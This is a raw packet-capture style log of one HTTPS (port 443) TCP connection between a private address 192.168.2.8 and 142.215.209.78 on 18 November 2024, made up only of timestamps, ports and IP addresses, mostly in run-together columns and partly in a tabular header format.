                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.938606024 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.938672066 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.938731909 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.938750982 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.939934969 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.940001965 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.940032959 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.940057039 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.940080881 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.941286087 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.941370964 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.941385984 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.942120075 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.942195892 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.942210913 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:35.990740061 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.044816971 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.044831038 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.044913054 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.044929981 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.046011925 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.046021938 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.046087027 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.046093941 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.046850920 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.046860933 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.046920061 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.046928883 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.048423052 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.048472881 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.048484087 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.048491001 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.048515081 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.049263954 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.049329996 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.049335003 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.097059011 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.165318012 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.165334940 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.165437937 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.165488005 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.166610956 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.166623116 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.166687965 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.166706085 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.168174028 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.168185949 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.168246984 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.168266058 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.761208057 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.761214972 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.761240005 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.762195110 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.762259007 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.762267113 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.762782097 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.762845039 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.762851954 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.764801025 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.764861107 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.764869928 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.765372038 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.765439034 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.765446901 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.814213991 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.832854033 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.832886934 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.832941055 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.833007097 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.833019018 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.878848076 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.878943920 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.878951073 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.878959894 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.879005909 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.879455090 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.879481077 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.879514933 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.879523039 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.879544020 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.879573107 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.880728006 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.880831003 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.880866051 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.880888939 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.880893946 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.881119967 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.881464958 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.881545067 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.881550074 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.882311106 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.882390976 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.882399082 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.890010118 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.890086889 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.890093088 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.943835974 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.957906008 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.957947016 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.957964897 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.957999945 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.958060980 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.958070993 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.998282909 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.998306990 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.998356104 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.998377085 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.998393059 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.999387026 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.999407053 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.999424934 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.999442101 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.999461889 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:36.999481916 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.000569105 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.000587940 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.000638962 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.000646114 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.000664949 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.001945019 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.001988888 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.001996040 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.002006054 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.002031088 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.003379107 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.003442049 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.003448009 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.009108067 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.009167910 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.009176970 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.053204060 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.061047077 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.061067104 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.061136007 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.061151028 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.115705967 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.116508007 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.116530895 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.116566896 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.116586924 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.116641998 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.117511034 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.117530107 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.117562056 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:37.117573977 CET49706443192.168.2.8142.215.209.78
Timestamp                             Source Port  Dest Port  Source IP       Dest IP
Nov 18, 2024 16:52:37.117597103 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:37.117625952 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:37.118346930 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.118365049 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.118429899 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:37.118447065 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.119250059 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.119324923 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.119326115 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:37.119343042 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.119395018 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:37.121112108 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.121186018 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:37.121192932 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.121257067 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:37.121826887 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.121897936 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:37.121906042 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.128015041 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.128081083 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:37.128092051 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.178210020 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:37.179918051 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.179939032 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.180017948 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:37.180027008 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.225074053 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:37.235282898 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.235295057 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.235351086 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.235372066 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:37.235433102 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:37.236320019 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.236329079 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.236396074 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:37.236403942 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.237438917 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.237447977 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.237504959 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:37.237513065 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.238267899 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.238307953 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.238327980 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:37.238334894 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.238353014 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:37.240175962 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.240246058 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:37.240253925 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.241099119 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.241161108 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:37.241168022 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:37.287590027 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.306629896 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.306667089 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.306749105 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.306797028 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.306809902 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.308165073 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.308187008 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.308228016 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.308248997 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.308259964 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.310739040 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.310790062 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.310798883 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.310812950 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.310851097 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.311587095 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.311594963 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.311671019 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.311678886 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.312526941 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.312602997 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.312609911 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.314161062 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.314275026 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.314282894 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.314323902 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.315013885 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.315074921 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.315080881 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.315838099 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.315922022 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.315929890 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.316690922 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.316771030 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.316777945 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.317663908 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.317743063 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.317749023 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.318547010 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.318609953 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.318617105 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.320683002 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.320741892 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.320754051 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.321516991 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.321697950 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.321706057 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.322434902 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.322496891 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.322504044 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.323345900 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.323412895 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.323421955 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.324223042 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.324269056 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.324282885 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.324289083 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.324326038 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.325131893 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.325190067 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.325196028 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.325237989 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.326045990 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.326117039 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.326127052 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.326859951 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.326946974 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.326953888 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.327692986 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.327779055 CET   49706        443        192.168.2.8     142.215.209.78
Nov 18, 2024 16:52:38.327785969 CET   443          49706      142.215.209.78  192.168.2.8
Nov 18, 2024 16:52:38.328630924 CET   443          49706      142.215.209.78  192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.328685045 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.328685045 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.328700066 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.328752995 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.328763008 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.329570055 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.329631090 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.329638958 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.329689026 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.330426931 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.330491066 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.330498934 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.331482887 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.331548929 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.331557035 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.331590891 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.331676960 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.331681967 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.332314014 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.332385063 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.332396030 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.333432913 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.333517075 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.333524942 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.333539009 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.333595037 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.333602905 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.334275961 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.334342957 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.334352970 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.335155010 CET44349706142.215.209.78192.168.2.8
